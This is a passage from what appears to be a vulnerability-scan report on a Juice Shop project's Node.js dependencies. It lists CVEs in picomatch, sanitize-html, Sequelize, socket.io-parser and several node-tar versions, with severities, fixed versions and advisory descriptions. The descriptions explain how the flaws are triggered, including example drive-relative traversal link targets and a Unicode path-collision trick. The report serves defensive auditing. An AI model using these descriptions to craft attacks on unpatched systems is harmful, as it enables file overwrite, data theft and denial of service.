CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.0.4, 3.0.2, 2.3.2

+

Picomatch is a glob matcher written JavaScript. Versions prior to +4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of +Service (ReDoS) when processing crafted extglob patterns. Certain +patterns using extglob quantifiers such as +() and *(), + especially when combined with overlapping alternatives or nested +extglobs, are compiled into regular expressions that can exhibit +catastrophic backtracking on non-matching input. Applications are +impacted when they allow untrusted users to supply glob patterns that +are passed to picomatch for compilation or matching. In +those cases, an attacker can cause excessive CPU consumption and block +the Node.js event loop, resulting in a denial of service. Applications +that only use trusted, developer-controlled glob patterns are much less +likely to be exposed in a security-relevant way. This issue is fixed in +picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these +versions or later, depending on their supported release line. If +upgrading is not immediately possible, avoid passing untrusted glob +patterns to picomatch. Possible mitigations include disabling extglob support for untrusted patterns by using noextglob: true, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as +() and *(), + enforcing strict allowlists for accepted pattern syntax, running +matching in an isolated worker or separate process with time and +resource limits, and applying application-level request throttling and +input validation for any endpoint that accepts glob patterns.

+ + +
Mitigation
+

4.0.4, 3.0.2, 2.3.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33671
+https://github.com/micromatch/picomatch
+https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d
+https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj
+https://nvd.nist.gov/vuln/detail/CVE-2026-33671
+https://www.cve.org/CVERecord?id=CVE-2026-33671

+ + + + + + + +
+
+
+
+ Finding 186: CVE-2022-25887 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

sanitize-html: insecure global regular expression replacement logic may lead to ReDoS
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.7.1

+

The package sanitize-html before 2.7.1 are vulnerable to Regular +Expression Denial of Service (ReDoS) due to insecure global regular +expression replacement logic of HTML comment removal.

+ + +
Mitigation
+

2.7.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-25887
+https://github.com/apostrophecms/sanitize-html/commit/b4682c12fd30e12e82fa2d9b766de91d7d2cd23c
+https://github.com/apostrophecms/sanitize-html/pull/557
+https://nvd.nist.gov/vuln/detail/CVE-2022-25887
+https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3008102
+https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-2957526
+https://ubuntu.com/security/notices/USN-7464-1
+https://www.cve.org/CVERecord?id=CVE-2022-25887

+ + + + + + + +
+
+
+
+ Finding 194: CVE-2026-30951 Sequelize 6.37.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 89 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sequelize6.37.7
+ + + + + + + +
File Path
juice-shop/node_modules/sequelize/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

+ + +
Description
+

sequelize: Sequelize: Data exfiltration via SQL injection in JSON/JSONB where clause processing
+Target: Node.js
+Type: node-pkg
+Fixed version: 6.37.8

+

Sequelize is a Node.js ORM tool. Prior to 6.37.8, there is SQL +injection via unescaped cast type in JSON/JSONB where clause processing. + The _traverseJSON() function splits JSON path keys on :: to extract a +cast type, which is interpolated raw into CAST(... AS <type>) SQL. + An attacker who controls JSON object keys can inject arbitrary SQL and +exfiltrate data from any table. This vulnerability is fixed in 6.37.8.

+ + +
Mitigation
+

6.37.8

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-30951
+https://github.com/sequelize/sequelize
+https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr
+https://nvd.nist.gov/vuln/detail/CVE-2026-30951
+https://www.cve.org/CVERecord?id=CVE-2026-30951

+ + + + + + + +
+
+
+
+ Finding 196: CVE-2026-33151 socket.io-parser 4.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
socket.io-parser4.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/socket.io-parser/package.json
+
+
+
+ + + + + +
Description
+

socket.io: Socket.IO: Denial of Service due to excessive buffering of specially crafted packets
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.3.5, 3.4.4, 4.2.6

+

Socket.IO is an open source, real-time, bidirectional, event-based, +communication framework. Prior to versions 3.3.5, 3.4.4, and 4.2.6, a +specially crafted Socket.IO packet can make the server wait for a large +number of binary attachments and buffer them, which can be exploited to +make the server run out of memory. This issue has been patched in +versions 3.3.5, 3.4.4, and 4.2.6.

+ + +
Mitigation
+

3.3.5, 3.4.4, 4.2.6

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33151
+https://github.com/socketio/socket.io
+https://github.com/socketio/socket.io/commit/719f9ebab0772ffb882bd614b387e585c1aa75d4
+https://github.com/socketio/socket.io/commit/9d39f1f080510f036782f2177fac701cc041faaf
+https://github.com/socketio/socket.io/commit/b25738c416c4e32fbff62ee182afa8f6d0dacf78
+https://github.com/socketio/socket.io/security/advisories/GHSA-677m-j7p3-52f9
+https://nvd.nist.gov/vuln/detail/CVE-2026-33151
+https://www.cve.org/CVERecord?id=CVE-2026-33151

+ + + + + + + +
+
+
+
+ Finding 198: CVE-2026-23745 Tar 4.4.19 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar4.4.19
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.3

+

node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) +fails to sanitize the linkpath of Link (hardlink) and SymbolicLink +entries when preservePaths is false (the default secure behavior). This +allows malicious archives to bypass the extraction root restriction, +leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning +via absolute symlink targets. This vulnerability is fixed in 7.5.3.

+ + +
Mitigation
+

7.5.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-23745
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e
+https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97
+https://nvd.nist.gov/vuln/detail/CVE-2026-23745
+https://www.cve.org/CVERecord?id=CVE-2026-23745

+ + + + + + + +
+
+
+
+ Finding 199: CVE-2026-23950 Tar 4.4.19 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 176 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar4.4.19
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L

+ + +
Description
+

node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.4

+

node-tar,a Tar for Node.js, has a race condition vulnerability in +versions up to and including 7.5.3. This is due to an incomplete +handling of Unicode path collisions in the path-reservations + system. On case-insensitive or normalization-insensitive filesystems +(such as macOS APFS, In which it has been tested), the library fails to +lock colliding paths (e.g., ß and ss), +allowing them to be processed in parallel. This bypasses the library's +internal concurrency safeguards and permits Symlink Poisoning attacks +via race conditions. The library uses a PathReservations +system to ensure that metadata checks and file operations for the same +path are serialized. This prevents race conditions where one entry might + clobber another concurrently. This is a Race Condition which enables +Arbitrary File Overwrite. This vulnerability affects users and systems +using node-tar on macOS (APFS/HFS+). Because of using NFD Unicode normalization (in which ß and ss + are different), conflicting paths do not have their order properly +preserved under filesystems that ignore Unicode normalization (e.g., +APFS (in which ß causes an inode collision with ss)). This enables an attacker to circumvent internal parallelization locks (PathReservations) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates path-reservations.js to use a normalization form that matches the target filesystem's behavior (e.g., NFKD), followed by first toLocaleLowerCase('en') and then toLocaleUpperCase('en'). As a workaround, users who cannot upgrade promptly, and who are programmatically using node-tar to extract arbitrary tarball data should filter out all SymbolicLink entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.

+ + +
Mitigation
+

7.5.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-23950
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6
+https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w
+https://nvd.nist.gov/vuln/detail/CVE-2026-23950
+https://www.cve.org/CVERecord?id=CVE-2026-23950

+ + + + + + + +
+
+
+
+ Finding 200: CVE-2026-24842 Tar 4.4.19 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar4.4.19
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

+ + +
Description
+

node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.7

+

node-tar,a Tar for Node.js, contains a vulnerability in versions +prior to 7.5.7 where the security check for hardlink entries uses +different path resolution semantics than the actual hardlink creation +logic. This mismatch allows an attacker to craft a malicious TAR archive + that bypasses path traversal protections and creates hardlinks to +arbitrary files outside the extraction directory. Version 7.5.7 contains + a fix for the issue.

+ + +
Mitigation
+

7.5.7

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-24842
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46
+https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v
+https://nvd.nist.gov/vuln/detail/CVE-2026-24842
+https://www.cve.org/CVERecord?id=CVE-2026-24842

+ + + + + + + +
+
+
+
+ Finding 201: CVE-2026-26960 Tar 4.4.19 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar4.4.19
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

+ + +
Description
+

node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.8

+

node-tar is a full-featured Tar for Node.js. When using default +options in versions 7.5.7 and below, an attacker-controlled archive can +create a hardlink inside the extraction directory that points to a file +outside the extraction root, enabling arbitrary file read and write as +the extracting user. Severity is high because the primitive bypasses +path protections and turns archive extraction into a direct filesystem +access primitive. This issue has been fixed in version 7.5.8.

+ + +
Mitigation
+

7.5.8

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-26960
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384
+https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f
+https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx
+https://nvd.nist.gov/vuln/detail/CVE-2026-26960
+https://www.cve.org/CVERecord?id=CVE-2026-26960

+ + + + + + + +
+
+
+
+ Finding 202: CVE-2026-29786 Tar 4.4.19 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar4.4.19
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

node-tar: hardlink path traversal via drive-relative linkpath
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.10

+

node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, + tar can be tricked into creating a hardlink that points outside the +extraction directory by using a drive-relative link target such as +C:../target.txt, which enables file overwrite outside cwd during normal +tar.x() extraction. This issue has been patched in version 7.5.10.

+ + +
Mitigation
+

7.5.10

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-29786
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f
+https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96
+https://nvd.nist.gov/vuln/detail/CVE-2026-29786
+https://www.cve.org/CVERecord?id=CVE-2026-29786

+ + + + + + + +
+
+
+
+ Finding 203: CVE-2026-31802 Tar 4.4.19 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar4.4.19
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

tar: tar: File overwrite via drive-relative symlink traversal
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.11

+

node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, + tar (npm) can be tricked into creating a symlink that points outside +the extraction directory by using a drive-relative symlink target such +as C:../../../target.txt, which enables file overwrite outside cwd +during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.

+ + +
Mitigation
+

7.5.11

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-31802
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad
+https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256
+https://nvd.nist.gov/vuln/detail/CVE-2026-31802
+https://www.cve.org/CVERecord?id=CVE-2026-31802

+ + + + + + + +
+
+
+
+ Finding 205: CVE-2026-23745 Tar 6.2.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar6.2.1
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.3

+

node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) +fails to sanitize the linkpath of Link (hardlink) and SymbolicLink +entries when preservePaths is false (the default secure behavior). This +allows malicious archives to bypass the extraction root restriction, +leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning +via absolute symlink targets. This vulnerability is fixed in 7.5.3.

+ + +
Mitigation
+

7.5.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-23745
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e
+https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97
+https://nvd.nist.gov/vuln/detail/CVE-2026-23745
+https://www.cve.org/CVERecord?id=CVE-2026-23745

+ + + + + + + +
+
+
+
+ Finding 206: CVE-2026-23950 Tar 6.2.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 176 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar6.2.1
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L

+ + +
Description
+

node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.4

+

node-tar,a Tar for Node.js, has a race condition vulnerability in +versions up to and including 7.5.3. This is due to an incomplete +handling of Unicode path collisions in the path-reservations + system. On case-insensitive or normalization-insensitive filesystems +(such as macOS APFS, In which it has been tested), the library fails to +lock colliding paths (e.g., ß and ss), +allowing them to be processed in parallel. This bypasses the library's +internal concurrency safeguards and permits Symlink Poisoning attacks +via race conditions. The library uses a PathReservations +system to ensure that metadata checks and file operations for the same +path are serialized. This prevents race conditions where one entry might + clobber another concurrently. This is a Race Condition which enables +Arbitrary File Overwrite. This vulnerability affects users and systems +using node-tar on macOS (APFS/HFS+). Because of using NFD Unicode normalization (in which ß and ss + are different), conflicting paths do not have their order properly +preserved under filesystems that ignore Unicode normalization (e.g., +APFS (in which ß causes an inode collision with ss)). This enables an attacker to circumvent internal parallelization locks (PathReservations) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates path-reservations.js to use a normalization form that matches the target filesystem's behavior (e.g., NFKD), followed by first toLocaleLowerCase('en') and then toLocaleUpperCase('en'). As a workaround, users who cannot upgrade promptly, and who are programmatically using node-tar to extract arbitrary tarball data should filter out all SymbolicLink entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.

+ + +
Mitigation
+

7.5.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-23950
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6
+https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w
+https://nvd.nist.gov/vuln/detail/CVE-2026-23950
+https://www.cve.org/CVERecord?id=CVE-2026-23950

+ + + + + + + +
+
+
+
+ Finding 207: CVE-2026-24842 Tar 6.2.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar6.2.1
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

+ + +
Description
+

node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.7

+

node-tar,a Tar for Node.js, contains a vulnerability in versions +prior to 7.5.7 where the security check for hardlink entries uses +different path resolution semantics than the actual hardlink creation +logic. This mismatch allows an attacker to craft a malicious TAR archive + that bypasses path traversal protections and creates hardlinks to +arbitrary files outside the extraction directory. Version 7.5.7 contains + a fix for the issue.

+ + +
Mitigation
+

7.5.7

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-24842
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46
+https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v
+https://nvd.nist.gov/vuln/detail/CVE-2026-24842
+https://www.cve.org/CVERecord?id=CVE-2026-24842

+ + + + + + + +
+
+
+
+ Finding 208: CVE-2026-26960 Tar 6.2.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar6.2.1
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

+ + +
Description
+

node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.8

+

node-tar is a full-featured Tar for Node.js. When using default +options in versions 7.5.7 and below, an attacker-controlled archive can +create a hardlink inside the extraction directory that points to a file +outside the extraction root, enabling arbitrary file read and write as +the extracting user. Severity is high because the primitive bypasses +path protections and turns archive extraction into a direct filesystem +access primitive. This issue has been fixed in version 7.5.8.

+ + +
Mitigation
+

7.5.8

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-26960
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384
+https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f
+https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx
+https://nvd.nist.gov/vuln/detail/CVE-2026-26960
+https://www.cve.org/CVERecord?id=CVE-2026-26960

+ + + + + + + +
+
+
+
+ Finding 209: CVE-2026-29786 Tar 6.2.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar6.2.1
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

node-tar: hardlink path traversal via drive-relative linkpath
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.10

+

node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, + tar can be tricked into creating a hardlink that points outside the +extraction directory by using a drive-relative link target such as +C:../target.txt, which enables file overwrite outside cwd during normal +tar.x() extraction. This issue has been patched in version 7.5.10.

+ + +
Mitigation
+

7.5.10

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-29786
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f
+https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96
+https://nvd.nist.gov/vuln/detail/CVE-2026-29786
+https://www.cve.org/CVERecord?id=CVE-2026-29786

+ + + + + + + +
+
+
+
+ Finding 210: CVE-2026-31802 Tar 6.2.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar6.2.1
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

tar: tar: File overwrite via drive-relative symlink traversal
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.11

+

node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, + tar (npm) can be tricked into creating a symlink that points outside +the extraction directory by using a drive-relative symlink target such +as C:../../../target.txt, which enables file overwrite outside cwd +during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.

+ + +
Mitigation
+

7.5.11

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-31802
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad
+https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256
+https://nvd.nist.gov/vuln/detail/CVE-2026-31802
+https://www.cve.org/CVERecord?id=CVE-2026-31802

+ + + + + + + +
+
+
+
+ Finding 211: CVE-2026-23745 Tar 7.4.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar7.4.3
+ + + + + + + +
File Path
juice-shop/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.3

+

node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) +fails to sanitize the linkpath of Link (hardlink) and SymbolicLink +entries when preservePaths is false (the default secure behavior). This +allows malicious archives to bypass the extraction root restriction, +leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning +via absolute symlink targets. This vulnerability is fixed in 7.5.3.

+ + +
Mitigation
+

7.5.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-23745
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e
